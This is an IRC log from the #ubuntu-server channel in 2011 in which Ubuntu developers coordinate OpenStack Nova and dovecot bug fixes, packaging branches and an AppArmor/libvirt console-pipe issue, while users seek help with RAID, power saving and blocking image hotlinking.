<Daviey> soren: I think compatiable is more importiant than total compliance, which means there is an overlap.. as someone using it in an odd fashion might expose fail.. which leans towards strict being good.
<Daviey> ikonia: bug 831121
<uvirtbot> Launchpad bug 831121 in dovecot-antispam "dovecot-antispam version 1.4~rc3-1 failed to build in oneiric" [High,Confirmed] https://launchpad.net/bugs/831121
<ikonia> let me have a look
<Daviey> ikonia: bug 831179
<uvirtbot> Launchpad bug 831179 in dovecot-metadata-plugin "dovecot-metadata-plugin version 0.0.1~hg144-0ubuntu1 failed to build in oneiric" [High,Confirmed] https://launchpad.net/bugs/831179
<Daviey> super!
<soren> Daviey: It's sort of an odd situation. The rule about being liberal in what you accept and conservative in what you give back is sound in the general case, but if someone were to use OpenStack as a way to test if their stuff will work with EC2, we need to be strict/liberal in the exact same way as EC2. Which sounds like boring, tedious work.
<ikonia> I'll setup some VM's, Daviey whats time lines/urgency ?
<ikonia> 831121 certainly looks do-able
<Daviey> smoser / zul: worth us cherrypicking bug 854614?
<uvirtbot> Launchpad bug 854614 in nova "metadata service local-hostname is not fqdn" [Undecided,In progress] https://launchpad.net/bugs/854614
<ikonia> sorry 831179 I meant
<Daviey> soren: agreed.. then do you make the same non-compliant things that AWS does, or follow the spec?
<soren> Daviey: Oh, that's easy. Always do what EC2 does.
<Daviey> ikonia: as soon as possible, ideally before this thursday.
<Daviey> soren: EC2 doesn't 'do', it's a spec. :)
<soren> Daviey: I don't consider it an API specification as much as I consider it documentation of how things are (supposed to be).
<ikonia> Daviey: I'll set something up now and see if it's something I can help with
<ikonia> Daviey: may need a few "process" advice tips if I can get this working
<Daviey> ikonia: Rocking, feel free to ask questions in here, -motu or -devel if you want a hand. :)
<ikonia> Daviey: sure.
<soren> Daviey: There's no use in implementing what's in the "spec" if EC2 doesn't. We won't win any friends by claiming to be "the more correct EC2".
<smoser> Daviey, that is already cherry picked.
<Daviey> smoser: gah
<Daviey> soren: Hmm, are you using EC2 to talk about AWS's implementaion?
<soren> We should do exactly what EC2 does. It just so happens that they've been nice enough to document what they do pretty well. Occasionally, they get their docs wrong, but we're not implementing an open spec.
<soren> I am indeed.
 * Daviey finds that confusing
<Daviey> That is like saying, lets do what HTTP does, when they are talking about apache.
<soren> What would you call the thing that I call EC2, then?
<soren> I don't care much about the exact nomenclature as long as we can share it.
<Daviey> soren: AWS
<soren> "AWS" in my dictionary is the collection of the various services: EC2, S3, etc.
<soren> But whatever.
<soren> Let's call it AWS. As long as we share the terminology, we can talk :)
<Daviey> Hmm, you could be right
<Daviey> soren: so with bug 715443, i made it stricter than AWS's EC2 - but matching the EC2 published spec AIUI
<uvirtbot> Launchpad bug 715443 in nova "EC2 APIs Create Keypairs/Security Groups etc above database column limits gives weird results" [Low,Fix released] https://launchpad.net/bugs/715443
<Daviey> you think that was wrong?
<soren> Did it just truncate those names before?
<soren> Anyways: I'd prefer to do what AWS does. If that means accept arbitrarily long names for stuff, so be it. However, imposing a 255 char limit, but in the process ensuring that if someone creates a security group by some name, they can retrieve it again by that name, then that's an improvement.
 * soren needs to spend time elsewhere
<soren> a) my office is super dusty because a painter was here today sanding the walls, and b) I'm traveling tomorrow so shoud be spending time with the missus.
<Daviey> soren: I believe amazon lets you have other stuff, rather than just spaces, dashes, and underscores.. but the spec states just that
<Daviey> The length AWS handles correctly
<Daviey> soren: have fun o/
<zul> Daviey: smoser just did
<Daviey> zul: did what?
<Daviey> ah, bug 854614
<uvirtbot> Launchpad bug 854614 in nova "metadata service local-hostname is not fqdn" [Undecided,In progress] https://launchpad.net/bugs/854614
<zul> sorry had to pick up liam from the bus
<Daviey> smoser: It would be really good if you included LP: #BUGNUM syntaxt in changelogs :)
<smoser> which changelogs ?
<smoser> oh suck.
<smoser> sorry. yeah. i thought i did.
<zul> dont worry ill do it right i forgot to do one for i did
<zul> Daviey: i agree we should do what ec2 supposedly do do
<Daviey> zul: does the patch you added have a bug num?
<Daviey> i just pushed smosers
<zul> Daviey: it does now :)
<Daviey> wait, i didn't.. you beat me zul :)
<zul> Daviey: did you get any traction on that keys disapearing bug?
<TheEvilPhoenix> hey Daviey, any idea how uvirtbot is configged to just find the bug informations and then display new bugs here?
 * TheEvilPhoenix was wonderingi how the bots do that
<Daviey> zul: I am leaning towards it being a bad merge, where --deprecuated-auth was lost
<Daviey> deprecated*
<Daviey> zul: Once i enabled that on all the componets, it seemed to come back
<Daviey> TheEvilPhoenix: Uses the LP api.. there are three different bots, uvirtbot, ubottu (and clones) and mup.
<TheEvilPhoenix> Daviey:  ah.  i assume just some kind of timer to routinely check, or something?L
<zul> Daviey: ack
<Daviey> TheEvilPhoenix: there is actually an atom feed, but i suspect it processes via bug mail.
<TheEvilPhoenix> i see
<Daviey> SpamapS: Are you looking to get those transition bugs resolved this cycle, or is it one for next?
<TheEvilPhoenix> Daviey:  who manages uvirtbot?  and do you know what its framework is?
 * TheEvilPhoenix assumes python/supybot but isnt sure
<SpamapS> Daviey: runlevel1 ? those can wait
<Daviey> SpamapS: yeah, thanks
<SpamapS> Daviey: they're a necessity next cycle, but its not worth spending valuable resources on anymore for 11.10
<Daviey> TheEvilPhoenix: soren manages uvirtbot
<TheEvilPhoenix> thanks, i'll ask questions to soren then when i have them.
<TheEvilPhoenix> on another note, Daviey, got any more beta ISOs you need tested?
<TheEvilPhoenix> :P
<Daviey> TheEvilPhoenix: testing the latest daily is always appreciated, but no candidate images which need acceptance testing.
<TheEvilPhoenix> Daviey:  link to the dailies?
<Daviey> TheEvilPhoenix: bug triage is something that we really need help with :)
<Daviey> TheEvilPhoenix: http://cdimage.ubuntu.com/ubuntu-server/daily/current/
<TheEvilPhoenix> wtfh... slow laggy system today >.>
 * TheEvilPhoenix has a download speed of 5KBps >:(
<TheEvilPhoenix> ehh
<TheEvilPhoenix> i'll download it from a campus computer and throw the image onto a usb drive in about an hour
<TheEvilPhoenix> then i'll start testing the daily iso :P
<Daviey> TheEvilPhoenix: rocking!
<Daviey> zul: seen bzr commit -m "foo" --fixes=lp:bugnumber ?
<zul> no i havent
<Daviey> It logs the bug number in the bzr metadata, and links it to the bug report.
<zul> ah sweet....
 * zul puts it in his notebook
<Daviey> i dscovered it by accident
<uvirtbot> New bug: #860019 in mysql-5.1 (main) "package mysql-server-5.1 5.1.58-1ubuntu1 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/860019
<Daviey> smoser: yeah, probably right
<smoser> Daviey, zul both of you, use 'debcommit'
<smoser> then it just works
<smoser> (but obviously not if you do not type LP: # in the commit message)
<smoser> Daviey, did you mean to milestone https://bugs.launchpad.net/bugs/859814
<uvirtbot> Launchpad bug 859814 in cloud-init "Locale issues with beta-1/2 cloud-images" [Low,Incomplete]
<Daviey> smoser: debcommit when we are fixing your mess?
<smoser> i really have better things to do than fix a bug that existed for 2 years in the final week of this release.
<Daviey> 22:02 < Daviey> smoser: yeah, probably right
<smoser> why wouldn't you use debcommit when fixing a mess.
<Daviey> i prempted your question by 2 mins, i am GOOD>
<smoser> i dont know what "probably right" meant.
<smoser> ah.
<dkn> need help recovering my raid 10 array
<jjohansen> smoser: http://people.canonical.com/~jj/smoser/
<dkn> i have 4 disks in raid 10 software using mdadm, i was recovering one disk, when i lost another, i seemed to luck in as i could still access the files on the device, so i figured i had lost one of each of the raid 1 mirror disks, instead of two on one side of the raid 0 part
<jjohansen> sorry I forgot about it after I kicked of the build
<dkn> so i removed the failed disk's, and re added them to get mdadm to re sync again, then the mount for the raid 10 device went invalid, and isn't starting back up when i reboot
<PleXs> hmm why do my linux raid get recognised as /dev/md127 instead of md0? :O
<dkn> try sudo mdadm --help
<rcsheets> What is the reasoning behind USERGROUPS=yes in /etc/adduser.conf ?
<rcsheets> all i have been able to find is that changing it to no is not recommended, but not why
<tiphares> can someone help me get dropbox working on my US 11.04
<tiphares> i've followed the guide on the site, but when i run it it just freeze :(
<tiphares> nvm
<dkn> did u get it working tiphares?
<tiphares> ye
<dkn> what was the problem?
<tiphares> funny how everything magically works once you ask for assistance
<tiphares> don't know, don't care:P working now
<SpamapS> m_3: hey I have a fix for bug 854866 that I'm about to upload.. I just ran into it myself. :P
<uvirtbot> Launchpad bug 854866 in ganglia "some ganglia packages won't install because of useradd" [High,Confirmed] https://launchpad.net/bugs/854866
<SpamapS> m_3: I see your patch, which looks more "correct" than my fix, but I'm concerned about changing that much all at once this late.
<adam_g> zul: ping
<dkn> how do i get rid of a raid array? it's stalled and won't let me access any information about it in mdadm
<josheee12> hey guys.  i just pulled the hdd out of my old server and put it in a newer server, the hdd having ubuntu server installed.  now, none of the network interfaces appear under /etc/network/interfaces or ifconfig.  ideas?
<dkn> @josheee12 try ip addr show
<josheee12> i see lo, eth1, eth2 (which is presumably correct.  i have the onboard ethernet plus a usb ethernet adapter for testing).  what do now?
<dkn> ok so what do you do see in ifconfig ?
<josheee12> just lo
<dkn> ok so just add the auto eth1 and auto eth2 lines to your /etc/network/interfaces files
<dkn> file*
<josheee12> then ifup eth1?
<dkn> i think so
<josheee12> thank you dearly
<dkn> :)
<dkn> now if i could just reset this stubburn raid array
<josheee12> and NOW, to move all my MAC-configuration over
<josheee12> *mac-based
<josheee12> i'd offer to assist if i didn't break my own raid array last time i tried fixing it
<josheee12> thank god i has 3 drives on raid 1
#ubuntu-server 2011-09-27
<dkn> heh.... i had 4 drive raid10, unfortunetly 2 dropped off at the same time
<dkn> so i'm going to setup a 4 drive raid 1 and restore from backup....
<dkn> mdadm just won't let me get rid of the old array...
<dkn> and it's keeping the disc's busy so i can't create a new array
<dkn> grrr
<josheee12> how the hell does 2 fail at once?
<dkn> a great question...
<dkn> one of them dissappeared and reappeared last month, now two just did it
<dkn> not sure if they're just dying or what.... the connectors seem fine... so i'm just going to run it in raid1 to try and figure out what's going on...
<dkn> thank god for nightly backups
<josheee12> once, out of the blue, 1 of my 3 failed.  checked the other 2 drives, all fine.  checked the drive on another computer, fine.  what the hell is the chance the cable was failing?
<dkn> it's a sas splitter cable, so.... i duno....
<josheee12> mine were sata at that point
<josheee12> have u ever used xmonad?
<dkn> no?
<josheee12> it's a tiling window manager.  i just got it today, love it.
<dkn> lol
<josheee12> people think i'm crazy when i need a tiling wm on a setup with 4 monitors
<dkn> anyone good with mdadm & software raid????
<dkn> this thing just won't let me work on the md2
<dkn> omg...... apparantly third time is a charm.... lol
<m_3> SpamapS: yeah, cool... wasn't sure of the best way to submit/surface the ganglia fix
<m_3> I needed one working so I just put it in a ppa
<zul> adam_g: pong
<KM0201> is there a way to configure ubuntu server to go to sleep after a set period?
<twb> sleepd
<twb> Or if you just mean at specific times, atd or cron
<KM0201> hmm, i don't know much about atd or cron
<KM0201> buess i'll have to learn.
<twb> sleepd is more likely what you want
<KM0201> ok.
<KM0201> is there some instructions on configuring it?
<twb> RTFM
<KM0201> well, i didn't see a man page for it.
<twb> Try /usr/share/doc/sleepd then
<twb> My sleepd has a manpage, maybe your system is busted
<KM0201> i'll look at it.
<adam_g> zul: hey, was just wondering what the flow is for packaging changes in the nova packages.  do we merge to lp:~ubuntu-server-dev branches, and then push to the openstack ubuntu packagers, or the other way? im talking about general packaging fixes, not patches to the tree
<KM0201> twb: if I try to access a samba share, will that wake up my server?
<twb> No
<twb> You only asked about putting it to sleep, not waking it up
<KM0201> hmm
<KM0201> well, they would seem to go hand in hand
<twb> Waking it up by talking samba to it requires you to be running OS X on specialist Apple hardware; I'm not aware of anything else that can do anything layer-7 like that
<twb> You can do WOL but that will require your client to send a WOL packet
<KM0201> yeah, that wouldn't be bad, but my board doesn't suppor tWOL
<twb> And WOL also requires hardware support- right
<twb> If your goal is to reduce power consumption, but still have it respond to samba without having to walk over and push its power button or keyboard to wake it up, you're probably only going to be able to spin down disks and throttle the CPU, not put it into suspend-to-RAM or suspend-to-disk state
<KM0201> thats basically my goal
<KM0201> where could i learn to do that?.. what do i man or google?
<KM0201> it doesn't necessarily have to respond to samba, i mean, anyway i could wake it up, w/o physically being at the machine, would be fine
<twb> WOL is the only way I know
<twb> Or a monkey, of course
<KM0201> lol
<twb> Call the office, say "hey monkey, go push <button> on <machine>"
<twb> Re "what to read", probably whatever you can find about saving power
<KM0201> yea.
<twb> powertop, laptop-mode, cpufreq/cpu governor, etc.
<twb> hdparm/sdparm ricing
<twb> Don't get your hopes up, you probably won't save much power over the default configuration.
<KM0201> looking at the sleepd manpage.. i'm looking at the  options and one is          -N, --netdev
<KM0201>               Monitor  a network interface for activity based on packet count.
<KM0201>               eth0 is the default. This option may be used more than once with
<KM0201>               different network interfaces.
<twb> That's for keeping it awake
<KM0201> oh ok.
<twb> sleepd looks at <stuff>, and when <stuff> is absent for at least <period>, it puts the system to sleep
<KM0201> gotcha
<twb> Where <stuff> is usually things like keyboard activity, high load, etc
<KM0201> doesn't have anything to do w/ waking up
<twb> Right
<twb> The OS *can'* do that
<KM0201> right, my hardware cant
<twb> Of course, you could also tell sleepd to run something other than pm-suspend, e.g. "spin down the HDDs now please"
<twb> But it's probably better to leave such things to built-in controllers/kernel heuristics, and just tune the heuristics
<KM0201> i wonder if i could buy a PCI ethernet card and it support WOL.. probably not though, since that is often set in the BIOS
<KM0201> it'd require a new motherboard
<twb> Sorry, I'm not a WOL expert
<twb> I thought it was pretty common in mid- to high-range desktop boards these days
<twb> Did you check if there's a BIOS option to enable it?
<KM0201> oh yeah
<mattcen> Hi all. I'd like to do one-time password auth for SSH on Lucid. I'm currently using otpw (otpw-bin and libpam-otpw). Is this the accepted way to do it, or is there better software? I ask because otpw hasn't been actively maintained in about 8 years
<qman__> mattcen, last time I did it, I used libpam-otp
<qman__> not sure if/how they're different
<mattcen> qman__: It doesn't look like libpam-otp exists; the only result that appears is libpam-otpw (which I'm using)
<mattcen> (Unless you didn't use an ubuntu package)
<Gr3mlin> hay all, any rules to getting help?
<Gr3mlin> want to monitor my system temps and fan speeds. need help seting up lm-sensors
<Gr3mlin> amypme tjhere?
<Gr3mlin> or anyone there
<jamespage> morning all
<twb> root@luger:~# cat /etc/environment
<twb> PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games"
<twb> Is that the default on Lucid?
<beseku> Can anyone point me towards a way to block requests to an Ubuntu based web site from a specific referrer, (the site is hotlinking images) *before* they reach Apache?
<beseku>  I was recommended using Squid but found no guide to how to use it in this way, (well, no experience of it at all in fact)
<twb> beseku: why before apache?
<beseku> because the requests are too much for apache, (its a 256MB VPS getting hit by 100+ req p/s
<twb> Probably because your apache is all PHP-d up
<beseku> it is
<twb> Set up a static.example.net running something lightweight, and move all your static content there
<twb> like thttpd or nginx or something
<twb> You can't find out who the referer (sic) is until AFTER you've accepted the connection, so you can't do anything in e.g. iptables or tcpwrappers.  It *has* to be done in the httpd
<twb> Since you've bloated apache so much, you need a second httpd either next to or in front of it
<beseku> Apache isnt bloated, its got PHP 5 installed.
<shiny_> you could just set up nginx infront of apache
<beseku> Its pretty barebones, just not set up for this much traffic
<shiny_> serve those referral requests from it
<shiny_> pass everything else to apache
<shiny_> should be fine on 256 ram
<twb> beseku: right, so before you do anything you've already preforked
<shiny_> i served 1k+ requests that way on 512MB vps
<twb> beseku: although I grant you, if you measure it, 90% of the resources are consumed by PHP itself -- doesn't matter if it's running in mod_php5 or php-fgcid
<shiny_> you can also use apache with php5-fpm and worker
<twb> IIRC a hello world phpinfo() wanted like 10MB VSZ
<beseku> The issue is I *don't want* to serve this sites requests - they are upping my b/w costs and slowing the server down for real users
<beseku> so i want to block everything from them
<twb> beseku: see above re "you have to parse HEAD"
<twb> Er, s/HEAD/the header/
<koolhead17> hi all
<beseku> twb: Can this not be done with the IP Tables string match?
<shiny_> iptables -A INPUT -s source --dport 80 -p tcp -j DROP
<twb> If they're hotlinking to you, the requests *do not originate* from their site
<twb> The originate from the end user
<shiny_> but ye, twb is right :)
<beseku> So string match can;t pickup the referrer?
<beseku> Even though it inspects the request?
<twb> beseku: you mean like iptables -m string?
<beseku> Sure
<twb> jwz's law says: you fail
<twb> It might 90% work but the right solution is static.example.net and then detect referer in the httpd there
<beseku> OK. But with any of these solutions I need to up the memory on the system to redirect the traffic.
<shiny_> beseku, http://altlab.com/htaccess_tutorial.html something like this should work
<twb> Yes, but because you're using a sensible httpd, the overhead is less
<twb> Obviously apache cannot be the frontmost httpd
<beseku> Right, I anted to avoid rebuilding the env around Nginx or similar. Guess I don;t have a choice.
<beseku> Cheers for the helps peeps.
<twb> (If you have >1 IP, you can just put them side-by-side and not bother with reverse proxying at all)
<twb> And anyone with only one IP is probably some johnny-come-lately that should Get Off My Lawn
<shiny_> woo
<shiny_> i got 2 ips ! :P
<twb> Class C here
<shiny_> well i will be acquiring class A soon, just need to buy the hardware first .... obviously i need to bug some people ( that have the money ) to understand *why* do we need that :P
<shiny_> and we currently got 32 actually, but it ain't enough
<twb> Uh, you know A is /8, right?
<twb> They're all already delegated to the RIRs, and there can't be many left there either
<twb> Class A is 16777214 addresses
<shiny_> i know
<shiny_> we're talking with a regional provider
<shiny_> if there's none left, we will settle with several C's
<twb> Righto
<shiny_> <- Bulgaria, so not much IP usage, but the RIR's got some bought some time ago, and they're just keeping them
<twb> haha
<twb> Good thing you're not in china.  They nat entire cellphone networks to a few IPs there, because asia is so short of IPs
<shiny_> :D
<shiny_> well my company is joining efforts with a few others to build a public cloud and if the project is a go , we will need lots of ips
<shiny_> and
<shiny_> truth is it will be the least expense
<shiny_> :)
<lifeless> gl with that :)
<shiny_> hehe :)
<shiny_> well see how it goes
<jamespage> Daviey: mail-stack-delivery is borked in oneiric - bug 860336
<uvirtbot> Launchpad bug 860336 in dovecot "mail-stack-delivery configuration broken" [High,In progress] https://launchpad.net/bugs/860336
<jamespage> fixing up now
<uvirtbot> New bug: #860336 in dovecot (main) "mail-stack-delivery configuration broken" [High,In progress] https://launchpad.net/bugs/860336
<rbasak> Sep 26 13:05:41 <Daviey>	rbasak: can you push it with version string 2011.3-0ubuntu3~ppa0 ?
<rbasak> Daviey: is that still want you want for the version string now? Previous version in my branch is 2011.3~rc~20110920.r1192-0ubuntu2
<Daviey> rbasak: yeah so *3~ppa0 is good for us to test against, as it is less than *3, so when we do upload to the archive there is an upgrade path
<rbasak> Daviey: OK
<rbasak> Daviey: so when we do upload to the archive what would you expect the form of the version string to be?
<Daviey> rbasak: whatever is UNRELEASED on lp:~ubuntu-server-dev/nova/diablo
<Daviey> rbasak: http://bazaar.launchpad.net/~ubuntu-server-dev/nova/diablo/view/head:/debian/changelog
<rbasak> Daviey: Thanks. Although my patch is based on lp:~hudson-openstack/nova/milestone-proposed - I see that lp:~ubuntu-server-dev/nova/diablo has only debian/, but why does lp:~hudson-openstack/nova/milestone-proposed also have a debian/?
<ersi> If I have a machine, with two physical network interfaces (eth0, eth1) and one virtual interface (eth0.100) - and would like traffic forwarded from eth0.100 to eth1 - how would I do that? a) set net.ipv4.ip_forward to true and use iptables? 2) Could I use "net.ipv4.conf.eth0.forwarding", "net.ipv4.conf.eth2.forwarding", "net.ipv4.conf.eth0/100.forwarding" to accomplish the same thing, without iptable rules?
<Daviey> rbasak: zul wanted to do it that way :)
<Daviey> rbasak: you need to add a flat patch to debian/patches/foo
<ersi> Nevermind, I've solved that little routing fiddle.
<rbasak> Daviey: So what should the PPA be against? lp:~ubuntu-server-dev/nova/diablo or my current lp:~hudson-openstack/nova/milestone-proposed? Or are you saying I should take my patch, rebase and apply to debian/patches/foo in lp:~ubuntu-server-dev/nova/diablo?
<Daviey> rbasak: That would be ideal
<Daviey> That is where it will end up fwiw.
<Gr3mlin> someone able to help my get lm-sensors working so i can monitor my servers temps?
<Gr3mlin> i mean me*
<Gr3mlin> wb
<koolhead17> hi all
<TeTeT> Gr3mlin: unfortunately I know nothing about lm-sensors set up, but there's a forum post covering some basics at http://ubuntuforums.org/showthread.php?t=1793074
<TeTeT> Gr3mlin: there's also this basic page: https://help.ubuntu.com/community/SensorInstallHowto
<rbasak> How would a bzr user rebase from one upstream to another unrelated upstream (unrelated in terms of the commit graph)? I know how I'd do it with git, but it's making git-bzr-ng crash :-/
<Daviey> rbasak: It's usually not worth the effort to try and do it tbh
<Daviey> If they do not share common ancenstroy.
<rbasak> OK, so I've got a bzr branch with only debian/ checked out. What's the tool to bring in upstream, so that I can use quilt to manipulate debian/patches?
<lynxman> morning everyone
<koolhead17> hey lynxman
<lynxman> hey koolhead17 o/
<koolhead17> :)
<adam_> hey! i have an SFTP Ubuntu Server with chrooted home directories
<adam_> is there a way to encrypt those homedirectories so they are still accessible and writeable by the sftping users?
<adam_> i looked at Duplicity but that seems to only work for rsync :(
<_ruben> huh? if you chroot the users to their homedir, how could they access others' homedirs?
<jamespage> Daviey: are we targetting the 'upstart start on' bugs that SpamapS for oneiric?
<jamespage> feel quite late to potentially be changing the behaviour of service startup...
<zul> adam_g: push to the ubuntu-server-dev branch and then to the openstack-ubuntu-packagers branch
<Daviey> jamespage: nah, they are now for P
<jamespage> Daviey: ack - I pushed one with the dovecot/mail-stack-delivery fixes but I'll comment on the other MP's that utlemming has raised
<Daviey> jamespage: Use your judgement to see if they should be sponsored or not :)
<Daviey> jamespage: The worst that will happen is that it all goes horribly wrong, and we need to delay the release because of a call jamespage made.
<Daviey> So no stress, really.
<jamespage> haha
<jamespage> OK - I'll review individually - anything that looks like a no-brainer I'll sponsor - others will defer (that will include euca and samba BTW)
<Daviey> jamespage: sounds wise to me!
<mrryanjohnston> hey guys. I've got 1 machine with 1 nic with 2 ip addresses. Each of these ip addresses points to a different vhost in apache. When given a fresh reboot, it seems these ip addresses do their part; when you point to them in a browser, the different sites come up. However, it seems that, overnight, this functionality was lost; currently the browser sits as if waiting for a response, but then comes back and says the websit
<mrryanjohnston> Also, this server is running on a vmware server
<jamespage> Daviey: are you handling the puppet version upgrade MP?
<Daviey> jamespage: blocked on decision, review welcome.
<mrryanjohnston> I made a forums post about the issue if anyone is interested: http://ubuntuforums.org/showthread.php?p=11289764#post11289764
<rbasak> Got an interesting problem with the watch file in lp:~ubuntu-server-dev/nova/diablo. It specifies http://launchpad.net/nova/+download, but that page is paginated so it now needs http://launchpad.net/nova/+download?start=10.
<rbasak> (I worked around it for now by changing the watch file manually)
<rbasak> Not sure what a permanent fix for this should be.
<soren> rbasak: Sounds like a task for #launchpad
<soren> Uargh, /me is late for flight
<rbasak> soren: a +download?show=all or something do you think?
<uvirtbot> New bug: #860545 in samba (main) "package samba 2:3.5.8~dfsg-1ubuntu2.3 failed to install/upgrade: sub-processo script post-installation instalado retornou estado de saÃ­da de erro 1" [Undecided,New] https://launchpad.net/bugs/860545
<CluelessPerson> Hello, can someone help me with an init script?
<Daviey> rbasak: How is that bug looking?
<rbasak> Daviey: about to upload to the PPA now
<Daviey> Are you going to be in a position to submit it to nova upstream trunk for review today?
<rbasak> Daviey: I can't test it properly without the libvirt fix, I'm uncomfortable submitting to anything without that done
<Daviey> Does anyone want to investigate bug 655533?  Upgrade Natty->Oneiric with likewise-open installed?
<uvirtbot> Launchpad bug 655533 in likewise-open "[master] package likewise-open 5.4.0.42111-2ubuntu2 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1" [High,Confirmed] https://launchpad.net/bugs/655533
<Daviey> rbasak: Upstream doesn't depend on apparmor.. so for committing it upstream, only needs to work without contraint.
<Daviey> jdstrand: How did the libvirt issue get on?
<rbasak> Daviey: OK then I need to rebase against upstream and develop against that
<jdstrand> Daviey: I am iterating on a patch. am continuing on the work today
<jdstrand> I am doing it the right way (so it is upstreamable)
<jdstrand> rather than a hack. it is written, but there is a small bug and testing I need to do
<Daviey> jdstrand: if you want help testing, do ask. :)
<Daviey> rbasak: rebasing is fun!
<Daviey> rbasak: Ideally, we'd like to get the fix in trunk first, then cherrypick it back.
<rbasak> Daviey: as I've discovered. I've only just finished rebasing to lp:~ubuntu-server-dev/nova/diablo! It's a pain when there's debian/patches to manage as well :-/
 * rbasak might be missing some tooling that everyone else uses
<rbasak> Daviey: so why did I just rebase it away from trunk for the PPA?
<Daviey> maybe.. :(
<Daviey> rbasak: i expected the patch to easily ripped out of what you were doing, so we could start smoking it via a ppa.
<Daviey> Whlst we are doing that, submitted to upstream trunk.
<Daviey> When both are aligned, we upload it to Ubuntu :)
<rbasak> Daviey: ah, OK. The patch was easy to rip out, my unfamiliarity with the tools is what took ages
<Daviey> smoser: those two bugs you identified, if you do reproduce them - can you open ubuntu tasks on the bugs?
<smoser> they *do* reproduce
<smoser> 100%
<smoser> on Canonistack.
<smoser> but i'm just not sure of the versions deployed there.  we dont see them in our testing though.
<Daviey> :/
<Daviey> Well it's not even clear to me if it was fixed in Diablo or trunk
<smoser> so either a.) canonistack is not up to date on its glance b.) we're not testing the archive c.) the fix also affected nova (which canonistack *is* behind on) d.) i have no clue and i'm just making stuff up
<smoser> thierry  marked it fix-released
<smoser> which would mean in diablo
<smoser> but he is human
<Daviey> bug 845788, was only merged 12th Sept... so probable they don't have that
<uvirtbot> Launchpad bug 845788 in glance "update_image in glance.client doesn't add content-length so the swift backend can't chunk" [High,Fix released] https://launchpad.net/bugs/845788
<Daviey> smoser: ttx always makes mistakes :)
<cloakable> <smoser> but he is human < unlike us robots? ;)
<ttx> am I human ?
<cloakable> Yes. No. Maybe. Possibly. Possibly not.
<smoser> well.
<smoser> i'm looking at code
<smoser> and it seems not to be fixed
<smoser> at least the commit marked as having fixed it is not in diablo release
<smoser> er... is not in glance milestone-proposed
 * ttx checks
<smoser> yeah
<smoser> its not
<smoser> https://github.com/openstack/glance/blob/milestone-proposed/glance/client.py
<smoser> is the milestone link to view that
<smoser> https://github.com/openstack/glance/commit/6cfff16f2dc22a870bfe3808a7895dfbbaa11369 is the commit that *reports* to have fixed it
<smoser> cloakable, exactly. humans are feeble minded and distracted by shiney objects and beer
<smoser> but ttx did once win a staredown with a triceratops
<smoser> Daviey, so the next question is why don't we see this in our testing. are we not deploying archive builds? adam_g ? and why not ?
<Daviey> smoser: we were using archive builds, but then updated to a PPA snapshot.. upgrading to current archive is in-part i believe
<smoser> where?
<Daviey> where what/
<smoser> i'm talking about sapodilla and friends
<smoser> when we're deploying that we should be using archive.
<smoser> canonistack also should be, but i'm trying to sort out why we would not have seen this issue on sapodilla and friends but we do see it on canonistack.
<Daviey> we were, but whilst we were waiting for thaw- it made sense to test against the milstone.
<smoser> we should have seen it if we were testing against milestone also
<smoser> as milestone does not have that fix.
<CluelessPerson> http://paste2.org/p/1674594
<CluelessPerson> could someone please help me?
<CluelessPerson> I don't even know what's screwed up. >.<
<Daviey> smoser: seemingly not 100% reproducible
<Daviey> ?
<smoser> it seems to fail every time for me on canonistack
<rbasak> Daviey: OK the PPA build succeeded, so https://launchpad.net/~racb/+archive/fixes/+packages - except that of course it needs the libvirt fix before it'll be useful, and it's still only my best guess.
<PleXs> anyone here using vmware server on ubuntu server ?
<zul> rbasak: can you create a branch for that patch and i can pull it in
<Daviey> smoser: so do you think testing https://launchpadlibrarian.net/81191962/nova_2011.3-0ubuntu2_2011.3-0ubuntu3~ppa0.diff.gz is  bad idea?
<smoser> i think we should be testing what is in the archive.
<rbasak> zul: I have a branch that I can push (if I can figure out git-bzr-ng) but I'm really not happy for it to be taken in yet - it might well be buggy, I've not been able to test it properly yet because the ubuntu version needs the libvirt fix. I'm testing the patch against nova upstream now, so maybe after I've verified the patch properly?
<smoser> if you find issues in what is in the archive, it might be useful to test something *not* in the archive to help determine the issue
<smoser> but i think its fairly clear that our goal is to make the archive right
<smoser> this is begging to be tried out: http://blog.picloud.com/2011/09/26/introducing-environments-run-anything-on-picloud/
<jdstrand> rbasak: hey, do you have a moment?
<rbasak> jdstrand: yeah sure
<jdstrand> rbasak: I would like to confirm that when using 'pipe', I only need <path>.in and <path>.out as opposed to also needing <path>
<jdstrand> rbasak: can I trouble you to go through a few steps?
<rbasak> jdstrand: yes, that's my understanding from the qemu manpage. I'm certainly not creating a <path> anything
<jdstrand> rbasak: do you have a vm handy to test this?
<rbasak> jdstrand: I can have one in a few minutes
<jdstrand> rbasak: that would be great, thanks
<Potatoe> I have a command that is behaving differently when run from the prompt and when run from crontab. How does crontab execute the command? Can I call the command manually the same way cron does to help identify the issue ?
<rbasak> jdstrand: OK, I've got it reproducing on a patched nova upstream trunk running from a source directory, using what is I think the system libvirt from oneiric - 0.9.2-4ubuntu13
<jdstrand> rbasak: cool. so first, I want to reproduce the problem. please start a vm that is using type='pipe' for the console
<rbasak> jdstrand: I've in fact already done that, so I've got failures logged in kern.log
<jdstrand> rbasak: can you paste the failure?
<rbasak> [ 1726.219190] type=1400 audit(1317134876.796:30): apparmor="DENIED" operation="open" parent=1 profile="libvirt-fa79d894-ae96-3ac2-6aa8-1a9ef5f96804" name="/home/ubuntu/nova/instances/instance-00000003/console.fifo.in" pid=2484 comm="qemu" requested_mask="rw" denied_mask="rw" fsuid=105 ouid=105
<rbasak> [ 1726.219203] type=1400 audit(1317134876.796:31): apparmor="DENIED" operation="open" parent=1 profile="libvirt-fa79d894-ae96-3ac2-6aa8-1a9ef5f96804" name="/home/ubuntu/nova/instances/instance-00000003/console.fifo.out" pid=2484 comm="qemu" requested_mask="rw" denied_mask="rw" fsuid=105 ouid=105
<jdstrand> rbasak: can you adjust /etc/apparmor.d/libvirt/libvirt-fa79d894-ae96-3ac2-6aa8-1a9ef5f96804 to have:
<jdstrand>   /home/ubuntu/nova/instances/instance-00000003/console.fifo.out rw,
<jdstrand>   /home/ubuntu/nova/instances/instance-00000003/console.fifo.in rw,
<jdstrand>   audit deny /home/ubuntu/nova/instances/instance-00000003/console.fifo rwmkl,
